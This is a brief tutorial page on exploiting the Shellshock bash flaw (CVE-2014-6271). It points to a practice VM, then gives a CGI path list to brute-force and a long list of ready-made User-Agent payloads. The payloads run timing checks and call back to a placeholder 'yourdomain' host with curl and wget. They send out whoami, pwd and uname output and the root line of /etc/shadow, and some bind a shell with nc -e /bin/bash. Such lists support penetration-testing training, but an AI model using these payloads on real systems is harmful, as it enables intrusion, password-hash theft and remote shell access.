A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation and gaining shell back to the host. CC: [email protected] https://twitter.com/CrowdShield Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271
Shellshock CGI-BIN Brute Force List:
/ /cgi-bin/bash /cgi-bin/contact.cgi /cgi-bin/defaultwebpage.cgi /cgi-bin/env.cgi /cgi-bin/fire.cgi /cgi-bin/forum.cgi /cgi-bin/hello.cgi /cgi-bin/index.cgi /cgi-bin/login.cgi /cgi-bin/main.cgi /cgi-bin/meme.cgi /cgi-bin/php /cgi-bin/php4 /cgi-bin/php5 /cgi-bin/php5-cli /cgi-bin/recent.cgi /cgi-bin/sat-ir-web.pl /cgi-bin-sdb/printenv /cgi-bin/status /cgi-bin/test-cgi /cgi-bin/test.cgi /cgi-bin/test-cgi.pl /cgi-bin/test.sh /cgi-bin/tools/tools.pl /cgi-mod/index.cgi /cgi-sys/defaultwebpage.cgi /cgi-sys/entropysearch.cgi /cgi-sys/php5 /phppath/cgi_wrapper /phppath/php
Shellshock User-Agent Strings:
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9" () { :;}; echo vulnerable 10 () { :;}; wget http://yourdomain/shellshock.txt?vuln=11 () { :;}; curl http://yourdomain/shellshock.txt?vuln=12 () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");' () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"